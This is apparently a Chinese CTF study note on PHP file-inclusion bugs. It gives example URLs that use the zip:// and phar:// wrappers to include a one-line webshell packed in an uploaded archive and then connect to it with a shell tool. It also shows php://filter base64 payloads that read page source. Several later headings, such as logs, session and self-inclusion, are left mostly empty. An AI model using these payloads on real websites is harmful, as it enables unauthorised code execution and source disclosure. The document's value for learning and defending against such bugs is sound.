文件包含漏洞
伪协议
zip://
图中是一题存在文件包含的题目
这里的url/?index.php?url=upload
应该是与upload.php
等价
所以我们可以知道,文件包含默认将末尾的文件添加了.php的后缀
绕过方法:
首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。
http://地址/index.php?url=zip://上传文件路径#(%23)shell
http://localhost/?url=zip:///var/www/html/upload/xxx.zip%23shell
注意:图中两处箭头处会出现错误
箭头1:#可能需要转码,使用%23
箭头2:文件包含默认将末尾的文件添加了.php的后缀,所以我们要改成phpinfo
phar://
功能和zip://类似
也是写一个一句话木马shell.php接着压缩成zip或jpg文件。上传文件后使用shell工具进行连接。
http://地址/index.php?url=phar://上传文件路径/shell
http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.zip/shell
php://filter
主要应用于文件包含中文件读取方面的问题,通过该函数可以查看网页源代码
使用方法:
1、利用base64获得源码
2、通过读写编码实行绕过操作
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://filter/read=convert.base64-encode/resource=index.php
php:\input
这里读者也没有过多的了解这个,只知道可以当作post请求来使用
data://text/plain;
日志文件:
系统环境:
session:
什么是session?
在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的Web页之间跳转时,存储在Session对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web页时,如果该用户还没有会话,则Web服务器将自动创建一个 Session对象。当会话过期或被放弃后,服务器将终止该会话。
phpinfo
自包含
顾名思义,自己包含自己
php崩溃
小玩一下